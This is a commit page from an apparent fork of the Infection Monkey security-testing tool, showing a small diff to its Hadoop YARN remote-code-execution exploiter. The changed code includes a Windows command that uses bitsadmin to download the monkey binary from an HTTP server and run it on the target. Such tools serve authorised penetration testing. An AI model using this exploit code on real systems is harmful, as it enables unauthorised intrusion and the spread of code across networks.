p15693087
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests 1 Projects Releases Wiki Activity

Hadoop exploitation tested on windows and linux

This commit is contained in:
Vakaris 2018-08-28 19:33:36 +03:00
parent 568320c298
commit 818aae3a2c
1 changed files with 5 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

13
infection_monkey/exploit/hadoop.py
View File

@ -11,7 +11,7 @@ import logging
from exploit.web_rce import WebRCE from exploit.web_rce import WebRCE
from tools import HTTPTools, build_monkey_commandline, get_monkey_depth from tools import HTTPTools, build_monkey_commandline, get_monkey_depth
import posixpath import posixpath
from model import MONKEY_ARG, ID_STRING, DROPPER_ARG from model import MONKEY_ARG, ID_STRING
__author__ = 'VakarisZ' __author__ = 'VakarisZ'
@ -32,14 +32,12 @@ class HadoopExploiter(WebRCE):
" Update /download /priority high %(http_path)s %(monkey_path)s " \ " Update /download /priority high %(http_path)s %(monkey_path)s " \
"& %(monkey_path)s %(monkey_type)s %(parameters)s" "& %(monkey_path)s %(monkey_type)s %(parameters)s"
# How long we have our http server open for downloads in seconds # How long we have our http server open for downloads in seconds
DOWNLOAD_TIMEOUT = 90 DOWNLOAD_TIMEOUT = 60
# Random string's length that's used for creating unique app name # Random string's length that's used for creating unique app name
RAN_STR_LEN = 6 RAN_STR_LEN = 6
def __init__(self, host): def __init__(self, host):
super(HadoopExploiter, self).__init__(host, {'linux': './monkey.sh', super(HadoopExploiter, self).__init__(host)
'win32': '%temp%\\monkey32.exe',
'win64': '%temp%\\monkey64.exe'})
def exploit_host(self): def exploit_host(self):
# Try to get exploitable url # Try to get exploitable url
@ -77,16 +75,15 @@ class HadoopExploiter(WebRCE):
return resp.status_code == 200 return resp.status_code == 200
def build_command(self, path, http_path): def build_command(self, path, http_path):
default_path = self.get_default_dropper_path()
# Build command to execute # Build command to execute
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, default_path) monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
if 'linux' in self.host.os['type']: if 'linux' in self.host.os['type']:
base_command = self.LINUX_COMMAND base_command = self.LINUX_COMMAND
else: else:
base_command = self.WINDOWS_COMMAND base_command = self.WINDOWS_COMMAND
return base_command % {"monkey_path": path, "http_path": http_path, return base_command % {"monkey_path": path, "http_path": http_path,
"monkey_type": DROPPER_ARG, "parameters": monkey_cmd} "monkey_type": MONKEY_ARG, "parameters": monkey_cmd}
@staticmethod @staticmethod
def build_payload(app_id, name, command): def build_payload(app_id, name, command):